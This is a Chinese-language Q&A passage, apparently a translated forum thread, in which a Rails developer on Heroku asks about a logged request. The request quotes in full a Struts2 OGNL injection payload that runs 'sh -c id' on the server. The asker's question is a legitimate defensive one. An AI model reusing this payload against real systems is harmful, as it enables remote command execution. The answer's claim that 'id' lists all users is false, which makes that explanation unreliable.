我们在heroku上托管的ruby on rails应用程序一直抛出奇怪的“未知格式”错误。检查发生的情况后,似乎有人/某事正试图将此字符串发布到我们的登录操作:
/login.action?redirect:$%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String[]%7B%27sh%27,%27-c%27,%27id%27%7D)).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char[50000],%23d.read(%23e),%23matt=%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D=
这是黑客企图吗?如果是,我应该担心吗?我自己运行了post命令(使用curl),但什么也没有得到。。
1条答案
按热度按时间flvlnr441#
看着
new%20java.lang.String[]%7B%27sh%27,%27-c%27,%27id%27%7D)
它将列出机器中的所有用户。由于它是java,并且您正在运行ruby应用程序,我怀疑heroku dynos上是否会安装java。为了安全起见,您可以清理输入ref:在rails中清理用户输入的最佳方法